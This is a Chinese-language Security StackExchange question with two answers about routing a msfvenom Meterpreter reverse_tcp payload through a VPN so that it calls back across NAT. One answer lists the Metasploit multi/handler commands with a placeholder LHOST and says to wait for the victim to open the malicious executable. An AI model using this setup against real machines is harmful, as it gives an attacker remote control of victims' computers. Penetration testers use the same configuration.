我有以下情况:
攻击者计算机连接到具有从ISP分配的公共IP的路由器,并启用转发。
受害者机器连接到另一个路由器,(显然)从不同的ISP分配不同的IP。
我想用反向tcp建立一个计量器会话。我使用msfvenom创建有效负载可执行文件,将攻击者路由器的公共IP作为LHOST参数,然后启动侦听器将攻击者机器的本地IP设置为LHOST。
在这里之前没问题。
我试图对连接到自制VPN服务器的攻击者进行同样的操作,但没有成功。有可能这样做吗?
如果是这样的话,我必须在有效负载和侦听器中设置哪些IP地址才能使其正常工作?
发布于 2016-03-31 18:22:15
如果您使用的是反向外壳,则需要使用攻击者VPN IP设置LHOST,而不是内部LAN IP。此外,您还需要使用Metasploit本地侦听特定端口,该端口应该设置在LPORT上,并且必须与msfvenom (es )相同。443)。要实现这一点,您可以使用:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit然后等待受害者打开恶意的可执行文件。
发布于 2016-03-31 18:14:44
是的,如果您使用openvpn是可能的。你可以建立一个非军事区。Openvpn有能力做到这一点。如果配置了dmz,vpn公共ip可以将端口转发给客户端。您应该将VPN的IP设置为LHOST,而不是将内部客户端ip设置为LHOST。
https://security.stackexchange.com/questions/119100
复制相似问题